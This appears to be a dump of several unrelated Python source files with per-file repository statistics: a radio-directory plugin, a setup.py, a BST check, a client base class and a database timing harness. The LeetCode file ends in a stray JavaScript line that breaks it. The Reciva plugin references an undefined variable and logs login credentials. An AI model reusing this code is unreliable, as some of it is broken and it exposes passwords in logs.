queue = None
if queue_type == QueueType.FIFO:
queue = self._fifo_queue_factory()
elif queue_type == QueueType.SEQUENCE:
queue = self._sequence_queue_factory()
else:
raise BbpypValueError("queue_type", queue_type, "unsupported queue type")
return queue
| 34.65 | 85 | 0.712843 | 81 | 693 | 5.654321 | 0.345679 | 0.209607 | 0.139738 | 0.131004 | 0.139738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.220779 | 693 | 19 | 86 | 36.473684 | 0.848148 | 0 | 0 | 0 | 0 | 0 | 0.046176 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05bf51d5a4d99bb71e1ff92fca3e542c34d1fe57 | 406 | py | Python | setup.py | OpenJarbas/pymetal | 33874ac4ad7ddbec3d80c44de3b3423baa8ce0c4 | [
"MIT"
] | 6 | 2020-03-27T12:08:06.000Z | 2021-05-16T06:55:04.000Z | setup.py | OpenJarbas/pymetal | 33874ac4ad7ddbec3d80c44de3b3423baa8ce0c4 | [
"MIT"
] | null | null | null | setup.py | OpenJarbas/pymetal | 33874ac4ad7ddbec3d80c44de3b3423baa8ce0c4 | [
"MIT"
] | 2 | 2020-08-16T16:36:27.000Z | 2022-02-13T00:58:07.000Z | from distutils.core import setup
setup(
name='pymetal',
version='0.5.0',
packages=[],
install_requires=["requests", "bs4", "requests_cache",
"random-user-agent", "lxml"],
url='https://www.github.com/OpenJarbas/pymetal',
license='Apache2.0',
author='jarbasAi',
author_email='jarbasai@mailfence.com',
description='metal archives, dark lyrics api'
)
| 27.066667 | 58 | 0.633005 | 46 | 406 | 5.521739 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018519 | 0.20197 | 406 | 14 | 59 | 29 | 0.765432 | 0 | 0 | 0 | 0 | 0 | 0.416256 | 0.054187 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05c0d55b652a7ee2f8c5354d6b41642da6b9172d | 6,459 | py | Python | contrib/disabled/reciva.py | leigh123linux/streamtuner2 | 43ded3a68bcf3d968a99c849d779fc8c3fb3d8d8 | [
"MIT"
] | 1 | 2019-03-03T19:58:01.000Z | 2019-03-03T19:58:01.000Z | contrib/disabled/reciva.py | leigh123linux/streamtuner2 | 43ded3a68bcf3d968a99c849d779fc8c3fb3d8d8 | [
"MIT"
] | null | null | null | contrib/disabled/reciva.py | leigh123linux/streamtuner2 | 43ded3a68bcf3d968a99c849d779fc8c3fb3d8d8 | [
"MIT"
] | null | null | null | # encoding: UTF-8
# api: streamtuner2
# title: Reciva
# url: https://radios.reciva.com/
# description: Home internet radio app and diverse station database.
# version: 0.4
# type: channel
# category: radio
# config: -
# status: obsolete
# priority: contrib
# png:
# iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEXiMATfORfhQyTrZk7uh3Tzs6n10879+/iUjtOkAAAAAWJLR0QAiAUdSAAAAAlwSFlzAAALEwAA
# CxMBAJqcGAAAAAd0SU1FB+AEBw4nI8D7wUYAAACISURBVAjXDc09D4JAFETREcParl/UvKdoKxi1JgZoiYnQSiJua2ST+ftud3KLGZDvYteT4DRTifqAFCvVmPBRl6um
# DsOWP1W5oUw42dQaFBu2lckqqJwxHg8Burx+u0WGXOW5nuoYZUhN6xMMKr03ryYMyj36WAee5OJaE7687R5zF8Cx2DvyD3ZIHyPRcAnIAAAAAElFTkSuQmCC
# extraction-method: dom, action-handler
#
# Reciva is a mobile app. They have a web directory though.
# It's a bit difficult to query, and streaming urls aren't
# directly accessible. But allows to fetch all stations from
# a category at once; so still a quick database.
#
# They probably have an API somewhere, but no public docs.
#
# You can optionally define a user account and password in
# `.netrc` (make a `machine reciva.com` entry) → which is
# going to be used implicitly.
#
import re
from pq import pq
import ahttp
import action
from config import *
from channels import *
# Reciva directory
class reciva (ChannelPlugin):
# module attributes
module = 'reciva'
listformat = "pls"
has_search = True
categories = ['60s', '70s', '80s', '90s', 'Adult', ['Adult Contemporary'], 'Alternative', 'Ambient', 'Bluegrass', 'Blues', 'Bollywood', 'Christian', ['Christian Contemporary'], 'Classic Rock', 'Classical', 'College', 'Comedy', 'Contemporary', 'Country', 'Dance', 'Discussion', 'Easy', 'Electronica', 'Experimental', 'Folk', 'Gospel', 'Greek', 'Hip Hop', 'Indian', 'Indie', ['Indie Rock'], 'Jazz', 'Jungle', 'Kids', 'Latin Hits', 'New Age', 'News', ['News Talk', 'News Updates'], 'Oldies', 'Pop', 'Public', 'Punk', 'Rap', 'Reggae', 'Religious', 'Rock', 'Short Wave Radio', 'Soft Rock', 'Spanish', 'Sports', 'Talk', 'Top 40', 'Unknown', 'Varied', 'World', ['World Africa', 'World Asia', 'World Caribbean', 'World Europe', 'World Mediterranean', 'World Middle East', 'World Tropical']]
catmap = { 'classical': '14', 'dance': '18', 'bluegrass': '52', 'contemporary': '16', 'pop': '34', 'spanish': '66', 'college': '15', 'rap': '38', 'ambient': '69', 'talk': '43', 'alternative': '9', 'religious': '39', 'blues': '10', 'folk': '23', 'classic rock': '13', '90s': '7', 'adult contemporary': '8', 'oldies': '33', 'indie rock': '54', 'electronica': '21', 'unknown': '45', 'discussion': '19', 'news talk': '31', 'world mediterranean': '55', 'sports': '42', 'new age': '51', 'indie': '27', 'indian': '65', 'easy': '20', '80s': '6', 'world africa': '67', 'comedy': '62', 'public': '35', 'jungle': '72', 'reggae': '48', 'world middle east': '50', 'christian': '11', 'world caribbean': '68', '60s': '58', 'world europe': '56', 'jazz': '28', '70s': '5', 'soft rock': '41', 'top 40': '44', 'adult': '57', 'news': '30', 'bollywood': '60', 'world tropical': '53', 'latin hits': '29', 'varied': '46', 'christian contemporary': '12', 'kids': '59', 'short wave radio': '73', 'world': '49', 'world asia': '47', 'country': '17', 'news updates': '32', 'punk': '36', 'greek': '25', 'hip hop': '26', 'rock': '40', 'gospel': '24', 'experimental': '22' }
titles = dict( genre="Genre", title="Station", playing="Location", bitrate="Bitrate", listeners=False )
base_url = "https://radios.reciva.com/stations/genre/%s?&start=0&count=%s"
# update list
def update_categories(self):
self.categories = []
html = ahttp.get(self.base_url % (1, 1))
for c in re.findall('id="cg-(\d+)">([\w\d\s]+)</a></li>', html):
self.catmap[c[1].lower()] = c[0]
self.categories.append(c[1])
# fetchy fetch
def update_streams(self, cat, search=None):
entries = []
if cat:
html = ahttp.get(self.base_url % (self.catmap[cat.lower()], conf.max_streams))
else: # search
html = ahttp.get("https://radios.reciva.com/stations/search?q=%s&categories=&codec=&min_bitrate=&max_bitrate=&working=true&count=%s" % (search, conf.max_streams))
if not html:
log.ERR("No results from http://radios.reciva.com/ server. Their category browsing sometimes breaks. We're not using the search function as that would strain their server too much. You might try adding login credentials to `.netrc` - albeit that rarely helps.", html)
return []
# extract
for row in (pq(row) for row in pq(html).find("#mytable").find(".oddrow, .evenrow")):
u = row.find(".streamlink")
if u:
id = re.findall("(\d+)", u.attr("href"))[0]
entries.append({
"title": row.find(".stationName").text(),
"id": id,
"url": "urn:reciva:%s" % id,
"homepage": "https://radios.reciva.com/station/%s" % id,
"playing": row.find(".stationLocation").text(),
"genre": row.find(".stationGenre").text(),
"format": mime_fmt(row.find(".streamCodec").text()[0:3]),
"bitrate": int(re.findall("\d+", row(".streamCodec").text()[4:] + " 0")[0]),
})
# done
return entries
# Fetch real `url` on stream access/playback (delay)
def resolve_urn(self, r):
if r["url"].startswith("urn:"):
id = r["url"].split(":")[2]
html = ahttp.get(
"https://radios.reciva.com/streamer?stationid=%s&streamnumber=0" % id,
timeout=4, quieter=True, statusmsg="Resolving actual stream URL for `%s`" % r["url"]
)
ls = re.findall("""(?:<iframe src=|iframe\()['"]([^'"]+)['"]""", html)
if ls:
r["url"] = ls[0]
else:
log.ERR("No stream found for reciva station #%s", row["id"])
return r
# Option login
def init2(self, *p):
lap = conf.netrc(varhosts = ("reciva.com", "radios.reciva.com"))
if lap:
log.LOGIN("Reciva account:", lap)
ahttp.get(
"https://radios.reciva.com/account/login",
{
"username": lap[0] or lap[1],
"password": lap[2]
},
timeout=2
)
| 53.380165 | 1,147 | 0.586004 | 754 | 6,459 | 5.005305 | 0.482759 | 0.023847 | 0.031797 | 0.031797 | 0.052994 | 0.036566 | 0.016958 | 0 | 0 | 0 | 0 | 0.042375 | 0.225422 | 6,459 | 120 | 1,148 | 53.825 | 0.711773 | 0.191051 | 0 | 0.028986 | 0 | 0.043478 | 0.410449 | 0.012339 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057971 | false | 0.014493 | 0.086957 | 0 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05c38eaa3065a8329a50e21ec13360c5ad6a7988 | 421 | py | Python | kaori/plugins/gacha/commands/test_analysis.py | austinpray/kizuna | b6f59b7d4a67ac68be65b75626e9f30c10f21e18 | [
"MIT"
] | 3 | 2018-04-18T04:52:50.000Z | 2019-11-07T18:47:43.000Z | kaori/plugins/gacha/commands/test_analysis.py | austinpray/kaori | b21c4146b9d0d27b87015cff0768138568a12e9c | [
"MIT"
] | 287 | 2020-04-21T02:39:47.000Z | 2022-03-28T13:11:59.000Z | kaori/plugins/gacha/commands/test_analysis.py | austinpray/kaori | b21c4146b9d0d27b87015cff0768138568a12e9c | [
"MIT"
] | 1 | 2020-10-22T00:20:43.000Z | 2020-10-22T00:20:43.000Z | import os
from .analysis import generate_report_charts
def test_report():
from ..engine.test.cards import sachiko, matt_morgan, ubu, xss, balanced_S, low_dmg
data = [sachiko, matt_morgan, ubu, ubu, xss, balanced_S, low_dmg]
report = generate_report_charts(data)
for f in report.values():
f.seek(0, os.SEEK_END)
assert report['rarity'].tell() > 0
assert report['natures'].tell() > 0
| 23.388889 | 87 | 0.686461 | 62 | 421 | 4.467742 | 0.516129 | 0.101083 | 0.144404 | 0.144404 | 0.151625 | 0.151625 | 0 | 0 | 0 | 0 | 0 | 0.00885 | 0.194774 | 421 | 17 | 88 | 24.764706 | 0.80826 | 0 | 0 | 0 | 1 | 0 | 0.030879 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05c9e68e31db7d2fa4d3a737415e47aa48ce8fa2 | 3,415 | py | Python | orpy/client/base.py | indigo-dc/orpy | 350439ce0188f19714c999b4ec7a2b8d507aa41b | [
"Apache-2.0"
] | 3 | 2019-06-07T15:26:25.000Z | 2020-02-03T16:53:59.000Z | orpy/client/base.py | indigo-dc/orpy | 350439ce0188f19714c999b4ec7a2b8d507aa41b | [
"Apache-2.0"
] | null | null | null | orpy/client/base.py | indigo-dc/orpy | 350439ce0188f19714c999b4ec7a2b8d507aa41b | [
"Apache-2.0"
] | 1 | 2020-03-09T11:38:00.000Z | 2020-03-09T11:38:00.000Z | # -*- coding: utf-8 -*-
# Copyright 2019 Spanish National Research Council (CSIC)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
class BaseObject(object):
"""Base class for all objects that represents orchestrator resoruces."""
def __init__(self, info):
"""Initalize the object.
:param dict info: A dictionary object containing the object's
information
"""
self._info = {}
self._add_details(info)
self.uuid = info.get("uuid", None)
def __repr__(self):
reprkeys = sorted(k
for k in self.__dict__.keys()
if k[0] != '_')
info = ", ".join("%s=%s" % (k, getattr(self, k)) for k in reprkeys)
return "<%s %s>" % (self.__class__.__name__, info)
def _add_details(self, info):
for (k, v) in info.items():
try:
setattr(self, k, v)
self._info[k] = v
except AttributeError:
# In this case we already defined the attribute on the class
pass
def __getattr__(self, k):
if k not in self.__dict__:
raise AttributeError(k)
else:
return self.__dict__[k]
def __eq__(self, other):
if not isinstance(other, BaseObject):
return NotImplemented
# two resources of different types are not equal
if not isinstance(other, self.__class__):
return False
if hasattr(self, 'id') and hasattr(other, 'id'):
return self.id == other.id
return self._info == other._info
def __ne__(self, other):
# Using not of '==' implementation because the not of
# __eq__, when it returns NotImplemented, is returning False.
return not self == other
def set_info(self, key, value):
"""Set an objects information with key, value.
:param key: the element to set
:param value: the value for the element
"""
self._info[key] = value
def to_dict(self):
"""Translate the object into a dictionary.
:return: A dictionary contaning the object representation
:rtype: dict
"""
return copy.deepcopy(self._info)
def get(self, k, default=None):
try:
return self.__getattr__(k)
except AttributeError:
return default
class Deployment(BaseObject):
"""Object that represents a deployment."""
pass
class Resource(BaseObject):
"""Object that represents a Resource."""
pass
class TOSCATemplate(BaseObject):
"""Object that repesents a TOSCA template."""
pass
class OrchestratorInfo(BaseObject):
"""Object that represents the Orchestrtor information."""
pass
class OrchestratorConfiguration(BaseObject):
"""Object that represents the Orchestrtor information."""
pass
| 29.439655 | 76 | 0.614934 | 412 | 3,415 | 4.93932 | 0.38835 | 0.027518 | 0.04914 | 0.058968 | 0.088452 | 0.057985 | 0.057985 | 0.057985 | 0 | 0 | 0 | 0.004139 | 0.292533 | 3,415 | 115 | 77 | 29.695652 | 0.838162 | 0.423133 | 0 | 0.188679 | 0 | 0 | 0.012555 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.169811 | false | 0.113208 | 0.018868 | 0.018868 | 0.490566 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
05d1503a50a40ab59c8577576303d29780043a35 | 583 | py | Python | Dataset/Leetcode/valid/98/709.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/98/709.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/98/709.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution:
def look(self, root, ret):
if root is None: return
self.look(root.left, ret)
ret.append(root.val)
self.look(root.right, ret)
def XXX(self, root: TreeNode) -> bool:
if not root: return True
ret = []
self.look(root, ret)
pre = ret[0]
for i in ret[1:]:
if i <= pre:
return False
pre = i
return True
undefined
for (i = 0; i < document.getElementsByTagName("code").length; i++) { console.log(document.getElementsByTagName("code")[i].innerText); }
| 25.347826 | 139 | 0.5506 | 76 | 583 | 4.223684 | 0.460526 | 0.074766 | 0.11215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007576 | 0.320755 | 583 | 22 | 140 | 26.5 | 0.80303 | 0 | 0 | 0 | 0 | 0 | 0.013769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05d3a0c5abc905c3e0faa0df30324743d44e29f4 | 237 | py | Python | PRIMEIRO MUNDO - FIRST WORLD/Convertendo temperatura - 14.py | MatheusKlebson/Python-Course | c1c5404095601733057bd91a96b5b4c45f0b5b9a | [
"MIT"
] | null | null | null | PRIMEIRO MUNDO - FIRST WORLD/Convertendo temperatura - 14.py | MatheusKlebson/Python-Course | c1c5404095601733057bd91a96b5b4c45f0b5b9a | [
"MIT"
] | 1 | 2020-11-25T15:47:38.000Z | 2020-11-25T15:47:38.000Z | PRIMEIRO MUNDO - FIRST WORLD/Convertendo temperatura - 14.py | MatheusKlebson/Python-Course | c1c5404095601733057bd91a96b5b4c45f0b5b9a | [
"MIT"
] | null | null | null | #Exercício Python 014: Escreva um programa que converta uma temperatura digitando em graus Celsius
# converta para graus Fahrenheit.
c = float(input("Temperatura em celsius: "))
f = c * 9/5 + 32
print("Convertendo...",f,"Em Fahrenheit")
| 39.5 | 98 | 0.742616 | 34 | 237 | 5.176471 | 0.735294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.14346 | 237 | 5 | 99 | 47.4 | 0.832512 | 0.544304 | 0 | 0 | 0 | 0 | 0.481132 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05d3a102efb6d11793798855b7fa90e66c7aee1d | 19,575 | py | Python | stand-alone-testing-of-alt-sql-from-proc-solns/python/proc-vs-top-level-sql-for-multi-stmt-txns/cmn.py | d-uspenskiy/tpcc | ed0311d73d8c1e7d1e055781522195964e5acdcb | [
"Apache-2.0"
] | 9 | 2020-01-22T20:21:32.000Z | 2021-06-30T02:36:45.000Z | stand-alone-testing-of-alt-sql-from-proc-solns/python/proc-vs-top-level-sql-for-multi-stmt-txns/cmn.py | d-uspenskiy/tpcc | ed0311d73d8c1e7d1e055781522195964e5acdcb | [
"Apache-2.0"
] | 44 | 2020-01-20T08:53:34.000Z | 2022-02-25T20:34:49.000Z | stand-alone-testing-of-alt-sql-from-proc-solns/python/proc-vs-top-level-sql-for-multi-stmt-txns/cmn.py | d-uspenskiy/tpcc | ed0311d73d8c1e7d1e055781522195964e5acdcb | [
"Apache-2.0"
] | 20 | 2020-04-24T23:24:21.000Z | 2022-01-13T03:58:35.000Z | import argparse
import psycopg2
import datetime
# ----------------------------------------------------------------------------------------
class DbSession:
def __init__(self, params):
self.session = psycopg2.connect(params.connect_str)
self.session.set_session(isolation_level="repeatable read", autocommit=True)
self.cur = self.session.cursor()
self.cur.execute("set client_min_messages = warning")
def execute(self, statement, the_vars=None):
try:
self.cur.execute(statement, the_vars)
except psycopg2.DatabaseError as error:
self.session.rollback()
print(error.pgcode)
print(error.pgerror)
raise
except Exception:
self.session.rollback()
print("\nUnexpected error")
raise
def close(self):
if self.session is not None:
self.cur.close()
self.session.close()
self.session = None
# ----------------------------------------------------------------------------------------
def parse_arguments():
parser = argparse.ArgumentParser("proc vs top-level SQL elapsed time experiment")
parser.add_argument(
"--db",
choices=["yb", "pg"],
default="pg",
help="yb: YugabyteDB, pg: PostgreSQL")
parser.add_argument(
"--mode",
choices=["one_shot", "all_successive", "all_interleaved", "create_tables", "do_timings_report"],
default="one_shot",
help="'db' always matters; 'nr_repeats' matters too for 'all_successive, all_interleaved'")
parser.add_argument(
"--report_name",
default="",
help='optional name suffix for the "timings_report" filename. The default (empty string) means "use system-generated suffix"')
parser.add_argument(
"--method",
choices=["sql", "proc"],
default="proc",
help="""
sql: many individual statements from client;
proc: stored procedure
""")
parser.add_argument(
"--nr_rows_per_txn",
default="1",
help="Number of rows per txn")
parser.add_argument(
"--nr_repeats",
default="1",
help="Number of repeats")
return parser.parse_args()
# ----------------------------------------------------------------------------------------
def do_timings_report(sess, params):
if params.approach == "s":
fname = "single-table-"
elif params.approach == "m":
fname = "many-tables-"
else:
assert False, 'logic error: bad "approach"'
if params.report_name != "":
fname += params.report_name + ".txt"
else:
# When many separate "one_shot" invocations are used, the last step
# is a dedicated "do_timings_report" invocation.
mode = params.mode
if mode == "do_timings_report":
mode = "all-one-shots"
# Replace possible arg-name underscores with hyphens for the filename.
fname += (mode + "-" + params.db + ".txt").replace("_", "-")
f = open(fname, "w+")
sess.execute("select t from timings_report()")
rows = sess.cur.fetchall()
for row in rows:
f.write(row[0] + "\n")
f.close()
# ----------------------------------------------------------------------------------------
class Params:
def __init__(self, db, approach, mode, report_name, method, nr_rows_per_txn_txt, nr_repeats_txt):
if db == "pg":
self.connect_str = "host=localhost dbname=demo user=u2 port=5432"
elif db == "yb":
self.connect_str = "host=localhost dbname=demo user=u2 port=5433"
self.db = db
self.approach = approach
self.mode = mode
self.report_name = report_name
self.method = method
self.nr_rows_per_txn = int(nr_rows_per_txn_txt, 10)
self.nr_repeats = int(nr_repeats_txt, 10)
# ------------------------------------------------------------------------------------
class Stmts:
start_txn = "start transaction isolation level repeatable read"
commit = "commit"
prepare_select_timing_tests_next_k = """
prepare select_timing_tests_next_k as
select timing_tests_next_k from timing_tests_pk_values where k = 1 for update;
"""
execute_select_timing_tests_next_k = "execute select_timing_tests_next_k"
prepare_update_timing_tests_next_k = """
prepare update_timing_tests_next_k as
update timing_tests_pk_values set timing_tests_next_k = timing_tests_next_k + 1;
"""
execute_update_timing_tests_next_k = "execute update_timing_tests_next_k"
prepare_insert_timing_tests = """
prepare insert_timing_tests(int, timestamp, text, text, text, text, int, int) as
insert into timing_tests(
k,
start_timestamp,
db,
approach,
mode,
method,
nr_rows_per_txn,
nr_repeats)
values(
$1,
$2,
$3,
$4,
$5,
$6,
$7,
$8)
"""
execute_insert_timing_tests = """
execute insert_timing_tests(%s::int, %s::timestamp, %s::text, %s::text, %s::text, %s::text, %s::int, %s::int)"""
prepare_select_times_next_k = """
prepare select_times_next_k as
select times_next_k from timing_tests_pk_values where k = 1 for update;
"""
execute_select_times_next_k = "execute select_times_next_k"
prepare_update_times_next_k = """
prepare update_times_next_k as
update timing_tests_pk_values set times_next_k = times_next_k + 1;
"""
execute_update_times_next_k = "execute update_times_next_k"
prepare_insert_times = """
prepare insert_times(int, int, timestamp, numeric) as
insert into times(
k,
timing_tests_k,
this_timestamp,
measured_ms)
values(
$1,
$2,
$3,
$4)
"""
execute_insert_times = """
execute insert_times(%s::int, %s::int, %s::timestamp, %s::numeric)
"""
# ------------------------------------------------------------------------------------
class StopWatch:
def __init__(self, sess, params):
# Formal step: define all instance attributes here.
self.sess = sess
self.timing_tests_k = 0
self.t_start = datetime.datetime.now()
self.sess.execute(Stmts.start_txn)
self.sess.execute(Stmts.execute_select_timing_tests_next_k)
rows = self.sess.cur.fetchall()
n = 0
for row in rows:
n += 1
assert n == 1, "Unexpected: should be just one row"
self.timing_tests_k = row[0]
self.sess.execute(Stmts.execute_update_timing_tests_next_k)
self.sess.execute(Stmts.commit)
self.sess.execute(Stmts.execute_insert_timing_tests,
(
self.timing_tests_k,
self.t_start.strftime("%Y-%m-%d %H:%M:%S"),
params.db,
params.approach,
params.mode,
params.method,
params.nr_rows_per_txn,
params.nr_repeats),
)
def start(self):
self.t_start = datetime.datetime.now()
def stop(self):
# Record the times in milliseconds
measured_ms = ((datetime.datetime.now() - self.t_start).total_seconds())*1000.0
t_now = datetime.datetime.now()
self.sess.execute(Stmts.start_txn)
self.sess.execute(Stmts.execute_select_times_next_k)
times_k = 0
rows = self.sess.cur.fetchall()
n = 0
for row in rows:
n += 1
assert n == 1, "Unexpected: should be just one row"
times_k = row[0]
self.sess.execute(Stmts.execute_update_times_next_k)
self.sess.execute(Stmts.commit)
self.sess.execute(Stmts.execute_insert_times,
(
times_k,
self.timing_tests_k,
t_now.strftime("%Y-%m-%d %H:%M:%S"),
measured_ms),
)
# ----------------------------------------------------------------------------------------
def create_timings_tables_and_views(sess):
"""
Notice that this sequence if separate SQL statements, separated by semi-colons, is
effectively a ".sql" script.It could easily be turned into this, and trivial Python code
could then read it into a single string value to be used, in turn, as the actual for
"sess,execute()".
Doing this would make the same reporting features available for use at the psql/ysqlsh prompt
to report on collected data in a single "timing_tests-times" table pair into which from
all runs, using both PG and YB could be collected by appropriately mechanized use of
"copy to" and "copy from".
"""
sess.execute("""
drop function if exists timings_report() cascade;
drop function if exists speed_ratio(text, text, int) cascade;
drop view if exists speed_ratios_versus_nr_rows_per_txn cascade;
drop view if exists avg_and_sddev_timings cascade;
drop view if exists raw_timings cascade;
drop table if exists times cascade;
drop table if exists timing_tests cascade;
drop table if exists timing_tests_pk_values cascade;
create table timing_tests_pk_values(
k int
constraint timing_tests_pk_values_pk primary key,
timing_tests_next_k int
constraint timing_tests_pk_values_timing_tests_next_k_nn not null,
constraint timing_tests_pk_values_timing_tests_next_k_chk check(timing_tests_next_k > 0),
times_next_k int
constraint timing_tests_pk_values_times_next_k_nn not null,
constraint timing_tests_pk_values_times_next_k_chk check(times_next_k > 0));
insert into timing_tests_pk_values(k, timing_tests_next_k, times_next_k)
values (1, 1, 1 );
create table timing_tests(
k int
constraint timing_tests_pk primary key,
start_timestamp timestamp
constraint timing_tests_start_timestamp_nn not null,
db text
constraint timing_tests_db_nn not null,
approach text
constraint timing_tests_approach_nn not null,
mode text
constraint timing_tests_mode_nn not null,
method text
constraint timing_tests_method_nn not null,
nr_repeats int
constraint timing_tests_nr_repeats_nn not null,
constraint timing_tests_nr_repeats_chk check(nr_repeats > 0),
nr_rows_per_txn int
constraint timing_tests_nr_rows_per_txn_nn not null,
constraint timing_tests_nr_rows_per_txn_chk check(nr_rows_per_txn > 0));
create unique index timing_tests_db_method_nr_rows_per_txn_unq
on timing_tests(db, method, nr_rows_per_txn);
create table times(
k int
constraint times_pk primary key,
timing_tests_k int
constraint times_timing_tests_k_nn not null,
this_timestamp timestamp
constraint times_this_timestamp not null,
measured_ms numeric
constraint times_measured_ms_nn not null,
constraint times_fk foreign key(timing_tests_k) references timing_tests(k));
create view raw_timings as
select
t1.k as t1_k,
t2.k as t2_k,
t1.start_timestamp,
t1.db,
t1.approach,
t1.mode,
t1.method,
t1.nr_repeats,
t1.nr_rows_per_txn,
t2.this_timestamp,
t2.measured_ms
from
timing_tests as t1
inner join times as t2 on t2.timing_tests_k = t1.k;
create view avg_and_sddev_timings as
select
t1_k,
start_timestamp,
db,
approach,
mode,
method,
nr_repeats,
nr_rows_per_txn,
min(this_timestamp) as min_this_timestamp,
max(this_timestamp) as max_this_timestamp,
avg(measured_ms) as avg_measured_ms,
stddev(measured_ms)::numeric as stddev_measured_ms,
min(measured_ms) as min_measured_ms,
max(measured_ms) as max_measured_ms
from raw_timings
group by
t1_k, start_timestamp, db, approach, mode, method, nr_repeats, nr_rows_per_txn;
create function speed_ratio(method_1 in text, method_2 in text, the_nr_rows_per_txn in int)
returns table(nr_rows_per_txn int, speed_ratio numeric)
immutable
language sql
as $body$
select the_nr_rows_per_txn,
(
(
select avg_measured_ms
from avg_and_sddev_timings
where method = method_1
and nr_rows_per_txn = the_nr_rows_per_txn
)
/
(
select avg_measured_ms
from avg_and_sddev_timings
where method = method_2
and nr_rows_per_txn = the_nr_rows_per_txn
)
);
$body$;
create view speed_ratios_versus_nr_rows_per_txn as
select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 1)
union all
select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 2)
union all
select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 4)
union all
select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 8)
union all
select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 16)
union all
select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 32)
union all
select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 64)
union all
select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 128)
union all
select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 256)
union all
select nr_rows_per_txn, speed_ratio from speed_ratio('sql', 'proc', 512);
create function timings_report()
returns table(t text)
immutable
language plpgsql
as $body$
begin
<<p>>declare
db text not null := '';
approach text not null := '';
mode text not null := '';
nr_repeats text not null := 0;
begin
select distinct a.db, a.approach, a.mode, ltrim(a.nr_repeats::text)
into strict p.db, p.approach, p.mode, p.nr_repeats
from avg_and_sddev_timings as a;
approach :=
case approach
when 's' then 'single-table'
when 'm' then 'many-tables'
end;
t := rpad('db:', 12)||db; return next;
t := rpad('approach:' , 12)||approach; return next;
t := rpad('mode:' , 12)||mode; return next;
t := rpad('nr_repeats:', 12)||nr_repeats; return next;
end p;
t := ''; return next;
<<q>>declare
nr_rows_per_txn text not null := '';
avg_measured_ms text not null := '';
